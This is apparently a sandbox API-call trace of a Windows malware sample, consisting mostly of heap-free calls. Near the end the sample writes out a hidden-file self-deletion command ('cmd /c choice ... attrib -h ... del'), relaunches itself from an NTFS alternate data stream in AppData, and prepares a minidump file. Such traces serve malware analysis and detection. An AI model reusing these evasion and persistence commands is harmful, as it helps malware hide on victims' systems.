hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9198 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7cf0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5bc0 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5c60 | out: hHeap=0x5a0000) returned 1 [0028.930] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9230 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5d00 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d92e0 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5da0 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5e40 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5ee0 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d5f80 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7d98 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d6020 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7e40 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7ee8 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d93a8 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9448 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d7f90 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8038 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d94e8 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc5f0 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d80e0 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc6a0 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9588 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8188 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8230 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9628 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d96c8 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9768 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d82d8 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5db390 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9808 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d98a8 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9948 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d99e8 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9a88 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8380 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9b28 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9bc8 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9c68 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9d08 | out: hHeap=0x5a0000) returned 1 [0028.931] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9da8 | out: hHeap=0x5a0000) returned 1 [0028.932] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d8428 | out: hHeap=0x5a0000) returned 1 [0028.932] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9e48 | out: hHeap=0x5a0000) returned 1 [0028.932] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9ee8 | out: hHeap=0x5a0000) returned 1 [0028.932] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9f88 | out: hHeap=0x5a0000) returned 1 [0028.932] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5da028 | out: hHeap=0x5a0000) returned 1 [0028.932] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5da0c8 | out: hHeap=0x5a0000) returned 1 [0028.932] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d84d0 | out: hHeap=0x5a0000) returned 1 [0028.932] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dc768 | out: hHeap=0x5a0000) returned 1 [0029.040] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0083.796] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x18ff64 | out: lpExitCode=0x18ff64*=0x0) returned 1 [0083.797] CloseHandle (hObject=0x9c) returned 1 [0083.797] CloseHandle (hObject=0x98) returned 1 [0083.797] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b1080 | out: hHeap=0x5a0000) returned 1 [0083.797] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e0750 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9620 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9b20 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9d28 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9dc8 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9e88 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9f48 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9460 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9480 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9660 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9b70 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9c68 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9d08 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9d48 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9d88 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9e28 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9e48 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9ec8 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9f08 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9f28 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba068 | out: hHeap=0x5a0000) returned 1 [0083.798] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba108 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba148 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba168 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba188 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9440 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9b90 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9c88 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9ce8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9e68 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9ee8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9fa8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9fc8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9fe8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba008 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba028 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba048 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba0c8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba0e8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9640 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9bb0 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9bd0 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9ca8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9cc8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9d68 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9da8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9de8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9e08 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9ea8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9f68 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9f88 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba088 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba0a8 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba128 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b40e0 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4130 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4298 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b42c0 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b43b0 | out: hHeap=0x5a0000) returned 1 [0083.799] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4428 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4450 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba5f0 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba618 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba780 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba7d0 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4108 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4158 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b41a8 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b41d0 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4248 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4338 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b43d8 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba528 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba5a0 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba5c8 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba640 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba6b8 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba6e0 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba708 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba730 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba820 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba848 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba870 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b40b8 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4180 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b41f8 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4220 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4310 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4360 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4388 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba550 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba578 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba668 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba7a8 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba7f8 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba898 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba8c0 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4270 | out: hHeap=0x5a0000) returned 1 [0083.800] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b42e8 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4400 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba690 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba758 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba8e8 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9b40 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba480 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba4b0 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba4e0 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5bad10 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5bad40 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9c20 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba450 | out: hHeap=0x5a0000) returned 1 [0083.801] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9bf0 | out: hHeap=0x5a0000) returned 1 [0083.801] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe") returned 48 [0083.801] lstrcmpW (lpString1=".exe", lpString2=":bin") returned -1 [0083.801] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x12a) returned 0x5d40e0 [0083.801] _snwprintf (in: _Dest=0x5d40e0, _Count=0x95, _Format="cmd /c choice /t %u /d y & attrib -h \"%s\" & del \"%s\"" | out: _Dest="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\"") returned 144 [0083.802] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fef8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ff3c | out: lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\"", lpProcessInformation=0x18ff3c*(hProcess=0x9c, hThread=0x98, dwProcessId=0xa34, dwThreadId=0x6c0)) returned 1 [0083.809] CloseHandle (hObject=0x98) returned 1 [0083.809] CloseHandle (hObject=0x9c) returned 1 [0083.809] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d40e0 | out: hHeap=0x5a0000) returned 1 [0083.809] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x0) returned 0x1001af6 [0083.809] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0083.809] CloseHandle (hObject=0x94) returned 1 [0083.811] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\srevho.dmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\srevho.dmp")) returned 1 [0083.813] ExitProcess (uExitCode=0x0) Thread: id = 37 os_tid = 0xb08 Process: id = "2" image_name = "pipe:bin" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe:bin" page_root = "0x4bac7000" os_pid = "0x6a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x754" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin\" -r" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0x5a8 [0029.097] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0029.097] GetProcessHeap () returned 0x260000 [0029.097] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x466c) returned 0x274be0 [0029.101] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0xb7e66cc0, dwHighDateTime=0x1d64ac6)) [0029.101] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0029.101] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=14975772187) returned 1 [0029.101] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x90 [0029.101] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0029.101] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x208) returned 0x279258 [0029.101] GetModuleFileNameW (in: hModule=0x1000000, lpFilename=0x279258, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe:bin")) returned 0x36 [0029.101] StrRChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin", lpEnd=0x0, wMatch=0x5c) returned="\\Pipe:bin" [0029.101] lstrlenW (lpString="Pipe:bin") returned 8 [0029.101] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x279468 [0029.101] PathFindExtensionW (pszPath="Pipe:bin") returned="" [0029.102] StrChrW (lpStart="Pipe:bin", wMatch=0x3a) returned=":bin" [0029.102] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0029.104] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0029.104] lstrlenW (lpString="Pipe") returned 4 [0029.105] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x26 [0029.105] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x5e) returned 0x279488 [0029.105] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x279488, nSize=0x26 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x26 [0029.105] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpString2="Pipe" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe" [0029.105] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe", lpString2=".dmp" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe.dmp") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe.dmp" [0029.105] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe.dmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\pipe.dmp"), 